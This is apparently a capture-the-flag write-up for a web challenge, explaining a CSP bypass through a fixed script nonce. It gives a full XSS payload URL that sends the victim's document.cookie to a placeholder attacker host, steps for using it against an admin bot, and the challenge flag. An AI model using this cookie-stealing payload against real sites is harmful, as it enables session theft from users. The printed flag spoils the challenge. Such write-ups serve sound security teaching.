Tags: web 


Becase value of nonce in script tag is fixed, so we can inject a script tag with the same value of hash and execute xss

Payload: `https://babier-csp.dicec.tf/?name=<script nonce=(your-hash)>window.location="<your-host>?cookie="+document.cookie</script>`
Send this url for bot admin and retrieve `secret` cookie.
And finally, access to `https://babier-csp.dicec.tf/<secret>` and view source to get flag.

Flag: `dice{web_1s_a_stat3_0f_grac3_857720}`